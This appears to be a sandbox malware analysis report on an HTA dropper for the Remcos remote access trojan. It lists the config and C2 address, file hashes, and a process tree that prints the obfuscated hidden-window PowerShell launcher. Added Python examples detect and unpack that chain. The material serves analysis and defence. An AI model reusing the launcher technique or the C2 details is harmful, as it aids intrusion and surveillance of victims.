Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    16-12-2024 16:25

General

  • Target

    newthingswithgreatupdateiongivenbestthingswithme.hta

  • Size

    143KB

  • MD5

    fd6fc3abb81de5133fb2de54b937ca20

  • SHA1

    241f7fa153504078a9a9b07f966f3c4e862a9545

  • SHA256

    73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644

  • SHA512

    5c37a3432112eb422e264101706a1c9e5bb7c266f064e8618b96e7e6e185800ffdf315d02f27cc23cd07e6a854bbbe19ccb5173eff885f8c808d76d6dab86516

  • SSDEEP

    768:tlEHKFlVum2oum2QB3S5KUJDVUKhC74GVf/AyK+v6Aq1Xl7zPRDIfz9esnkoFfz7:tl

Malware Config

Extracted

Family

remcos

Botnet

elvis

C2

107.173.4.16:2560

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-GJDISH

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is closed-source remote control and surveillance software that is widely abused as a remote access trojan.

  • Remcos family
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
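
The signatures above correspond to a process chain that endpoint telemetry can catch without any knowledge of the Remcos payload itself. The following is an added example, not part of the sandbox output: it rebuilds parent/child ancestry from constructed Sysmon-style process-creation events (same PIDs and image paths as this report; explorer.exe as the parent of mshta.exe is an assumption, since the report does not show it) and flags the HTA -> cmd -> PowerShell -> csc.exe / dropped-EXE chain, the hidden-window ExecutionPolicy Bypass launcher, and the DeviceCredentialDeployment.exe LOLBin call.

```python
"""Process-chain detection for the behaviours in this report (added example).
Events are constructed in the shape of Sysmon Event ID 1 fields; the root
explorer.exe event is an assumption, the rest mirrors the process tree."""
import ntpath
import re
from typing import Dict, List, Tuple

EVENTS = [
    {"pid": 1000, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},                                      # assumed root
    {"pid": 3068, "ppid": 1000, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\Admin\AppData\Local\Temp\newthingswithgreatupdateiongivenbestthingswithme.hta"'},
    {"pid": 2708, "ppid": 3068, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": "cmd.exe /C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; "
                "iex([Convert]::FromBase64String('<b64>'))"},           # blob shortened
    {"pid": 3004, "ppid": 2708, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; "
                "iex([Convert]::FromBase64String('<b64>'))"},
    {"pid": 2892, "ppid": 3004, "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
     "cmdline": r'csc.exe /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iumviw0b.cmdline"'},
    {"pid": 2828, "ppid": 2892, "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe",
     "cmdline": "cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"},
    {"pid": 2452, "ppid": 3004, "image": r"C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"'},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\")


def basename(image: str) -> str:
    return ntpath.basename(image).lower()


def ancestors(by_pid: Dict[int, dict], pid: int) -> List[str]:
    """Image basenames of a process's ancestors, nearest first; stops at an
    unknown parent PID or a PID cycle (reused PIDs can create one)."""
    chain, seen = [], {pid}
    ev = by_pid.get(pid)
    while ev is not None and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        ev = by_pid[ev["ppid"]]
        seen.add(ev["pid"])
        chain.append(basename(ev["image"]))
    return chain


def evaluate(events: List[dict]) -> List[Tuple[int, str]]:
    """Return (pid, rule) pairs for every event that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ev in events:
        name, cl = basename(ev["image"]), ev["cmdline"].lower()
        anc = ancestors(by_pid, ev["pid"])
        # HTA host anywhere above a shell: mshta -> cmd -> powershell
        if name in {"cmd.exe", "powershell.exe"} and "mshta.exe" in anc:
            hits.append((ev["pid"], "shell_under_mshta"))
        # -EX BYPass -W 1 (WindowStyle Hidden) plus an inline base64 decode
        if (name == "powershell.exe"
                and re.search(r"-(?:ex|ep|executionpolicy)\s+bypass", cl)
                and re.search(r"-(?:w|windowstyle)\s+(?:1|hidden)", cl)
                and "frombase64string" in cl):
            hits.append((ev["pid"], "ps_hidden_bypass_b64"))
        if "devicecredentialdeployment" in cl:
            hits.append((ev["pid"], "devicecredentialdeployment_lolbin"))
        # csc.exe under PowerShell is the Add-Type in-memory compile path
        if name == "csc.exe" and "powershell.exe" in anc:
            hits.append((ev["pid"], "powershell_compiles_csharp"))
        # executable started from a user-writable directory by a script host
        if (any(p in ev["image"].lower() for p in USER_WRITABLE)
                and any(a in SCRIPT_HOSTS for a in anc)):
            hits.append((ev["pid"], "dropped_exe_from_script_host"))
    return hits


if __name__ == "__main__":
    for pid, rule in evaluate(EVENTS):
        print(pid, rule)
```

cvtres.exe (PID 2828) is deliberately not flagged on its own: it is normal csc.exe behaviour, and the signal is the csc.exe parentage, not the resource compiler. DeviceCredentialDeployment.exe is a signed Windows binary whose documented LOLBin use is hiding the console window of the process that runs it, which is why the sandbox tags it as evasion; on a workstation its appearance in a PowerShell command line is rare enough to alert on directly.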

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\newthingswithgreatupdateiongivenbestthingswithme.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'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'+[cHAR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3004
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iumviw0b.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2892
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D81.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8D80.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2828
        • C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe
          "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
          4⤵
          • Executes dropped EXE
          PID:2452
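
The PowerShell command line in the tree hides [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("...")) behind random casing and [char] concatenation ([char]58 and [char]0x3A are both ':', [char]0x22 is '"'), then runs the result through two nested Invoke-Expression calls; the switches expand to -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command. What follows is an added example, not from the report or the sample: a static unpacker that resolves the [char] tokens, folds the '+' joins, expands the abbreviated switches and decodes the base64 argument. The report does not carry the real blob, so the sample command line below has a constructed placeholder in its place.

```python
"""Static unpacking of the PowerShell launcher in the process tree above.
Added example, not part of the sandbox output: the stage-2 base64 here is
a constructed placeholder because the report omits the real blob."""
import base64
import re
from typing import Dict, List, Optional

# Constructed stand-in for stage 2; the real payload is not on this page.
STAGE2_PLACEHOLDER = "Write-Host 'stage2 placeholder'"
SAMPLE_B64 = base64.b64encode(STAGE2_PLACEHOLDER.encode("utf-8")).decode("ascii")

# Same shape as the command line in the report, with the placeholder swapped in.
SAMPLE_CMDLINE = (
    "PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; "
    "INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+"
    "'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'"
    + SAMPLE_B64 + "'+[cHAR]0x22+'))')))"
)

_CHAR_TOKEN = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.IGNORECASE)
_CONCAT = re.compile(r"'\s*\+\s*'")          # '...'+'...'  ->  '......'
_B64_ARG = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"', re.IGNORECASE)
# powershell.exe accepts unambiguous prefixes of its switches; these are the
# ones the launcher uses.
_FLAG_NAMES = {"-ex": "-ExecutionPolicy", "-ep": "-ExecutionPolicy",
               "-nop": "-NoProfile", "-w": "-WindowStyle", "-c": "-Command"}
# -WindowStyle also takes the numeric ProcessWindowStyle value; 1 is Hidden.
_WINDOW_STYLES = {"0": "Normal", "1": "Hidden", "2": "Minimized", "3": "Maximized"}


def resolve_char_tokens(s: str) -> str:
    """Turn [char]58 / [char]0x3A (any casing) into the quoted literal ':'."""
    def _sub(m):
        tok = m.group(1)
        code = int(tok, 16) if tok.lower().startswith("0x") else int(tok, 10)
        return "'" + chr(code) + "'"
    return _CHAR_TOKEN.sub(_sub, s)


def fold_concatenation(s: str) -> str:
    """Merge runs of single-quoted literals joined with '+' into one literal."""
    return _CONCAT.sub("", s)


def normalize_flags(cmdline: str) -> List[str]:
    """Expand the abbreviated switches before -Command into canonical names."""
    head = re.split(r"\s-c\s", cmdline, maxsplit=1, flags=re.IGNORECASE)[0]
    tokens = head.split()[1:]                      # drop the executable token
    out, i = [], 0
    while i < len(tokens):
        name = _FLAG_NAMES.get(tokens[i].lower(), tokens[i])
        value: Optional[str] = None
        if i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
            value = tokens[i + 1]
        if name == "-WindowStyle":
            value = _WINDOW_STYLES.get(value, value)
        elif name == "-ExecutionPolicy" and value:
            value = value.capitalize()
        out.append(name if value is None else f"{name} {value}")
        i += 1 if value is None else 2
    out.append("-Command")
    return out


def unpack(cmdline: str) -> Dict[str, Optional[str]]:
    """Return the de-concatenated stage-1 text and the decoded stage-2 script
    (stage2 is None when no FromBase64String("...") argument is present)."""
    stage1 = fold_concatenation(resolve_char_tokens(cmdline))
    m = _B64_ARG.search(stage1)
    stage2 = base64.b64decode(m.group(1)).decode("utf-8", "replace") if m else None
    return {"stage1": stage1, "stage2": stage2}


if __name__ == "__main__":
    print(" ".join(normalize_flags(SAMPLE_CMDLINE)))
    print(unpack(SAMPLE_CMDLINE)["stage2"])
```

Run against the real command line from a process-creation event (with the blob present) the same code yields the stage-2 script that wrote iumviw0b.0.cs, compiled it through csc.exe and dropped nicetomeetyousweeet.exe; nothing in the deobfuscation depends on the casing, which is the point of normalising before matching.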

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES8D81.tmp

    Filesize

    1KB

    MD5

    cfbf1a73f9f344a92b29947c22823001

    SHA1

    67b0e360c270a1c7dcf66a3f9dff86d2e5755a36

    SHA256

    72464933b2beaf9006887fde1dd2be8e8f49f7d2e8037b6cb9c8646e408ecd97

    SHA512

    bc82fbed7360bdd441a9267ef5cbe5c8eabb156d1baed19ec5a3da119872603714c7a82574c4c3bbf8a07a2e903959ac21f0ea0f5a002acb693f30833d0f3008

  • C:\Users\Admin\AppData\Local\Temp\iumviw0b.dll

    Filesize

    3KB

    MD5

    2aff9539d8b5496867446be0a11a34cb

    SHA1

    3cc76f53f21330ad4519f64852ca1b9b0d8222b4

    SHA256

    0814f73abbfbd19d11606bffd7d626a1b22c3845b1fa4da7fb64879b003b9477

    SHA512

    38344a335bfa899a9f0d7530526b744eaa6f51bc8c8cb2abbda877e7f137a4f3188c2867cfc8b457f9ad4f03bb7785d0b39c11a2fa6c00805121f6b627ab1f55

  • C:\Users\Admin\AppData\Local\Temp\iumviw0b.pdb

    Filesize

    7KB

    MD5

    407a41d005178439a8a2de2ec3aea9f6

    SHA1

    839cf6acb8f6a63f8e118c2a6fc45b2e874245e5

    SHA256

    3d41fe5ddbc60fac9686d505d15c650557b0032cefc9327b03b27a788cd44503

    SHA512

    aa82badc314a786c03437d97d6a6aae07106bbf36e90c0051fab8d898ec43f25600348a25040f337ebcce3e57c3da0dca71c9f393eb65cb029bfeaff437ba26e

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC8D80.tmp

    Filesize

    652B

    MD5

    8fbc1b368c131e5ff1f2451990f26a47

    SHA1

    01554756afed2eab07c6db91758bcf2b4733e062

    SHA256

    1679bb6f4eec5e1b41a914c56098ba87d680b1ba2609f066243de398350d3ee2

    SHA512

    e8bea5db6a078b0a79123ceaa28e0c99f23e1065537450c985ea7d63a1e93aa14bf7179be1e703f6782d543f8627973275deafc2808583947936be860a651ca1

  • \??\c:\Users\Admin\AppData\Local\Temp\iumviw0b.0.cs

    Filesize

    493B

    MD5

    00df4ae943d803cb15795b1fd55ead94

    SHA1

    fc1509b646d150cc4d1c2d92cf772be4af67716b

    SHA256

    e8d13d324b35fc23a6729caa22125343bfebb09476a9334e93e8c1804ce6314a

    SHA512

    e40826e83f25a3be3fdf26c1d5a667d0eb40d53d3f0fe46f8cc395152cd1eb46b98e193fc3a3f06b6cefadbed030d2a90a5575c1d235228d53d5f152d2e85796

  • \??\c:\Users\Admin\AppData\Local\Temp\iumviw0b.cmdline

    Filesize

    309B

    MD5

    b9e3642d722cc8e7c53eb586d85ae917

    SHA1

    dd360fb19d03823012ccb02f3b9c47e73fd67615

    SHA256

    4a95fb947c304436645f5e1d0dbd24de06faeba95624649dc1341b0aea45cca6

    SHA512

    3065ce2e013087d64ef3852f95fb2bb511b8472f903bb943ff752e3658360b6ddbc496d2dcfee9135d465317e58dbedbf262a8f7191089f7b305d3c31e9a980a

  • \Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe

    Filesize

    528KB

    MD5

    a2d03c5333bfecca62720cd6ee3a4dc4

    SHA1

    ce4c380f2748f375904c17b38d4f93e294fef4f6

    SHA256

    ef8ec5181ab4cf85a5c4867089594f40900eaafb514496905eb86314c460178e

    SHA512

    5c9db8bb415da332c0adc24519ae0410a65aba932de15a682ce57efbc61b8b7d7e5e3548164909a5da5bc6966c351528626655fdbb7c21f3b4fd1974406ae04c

  • memory/2452-44-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-48-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-43-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-41-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-45-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-46-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-47-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-42-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-49-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-50-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-51-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-52-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-53-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-54-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB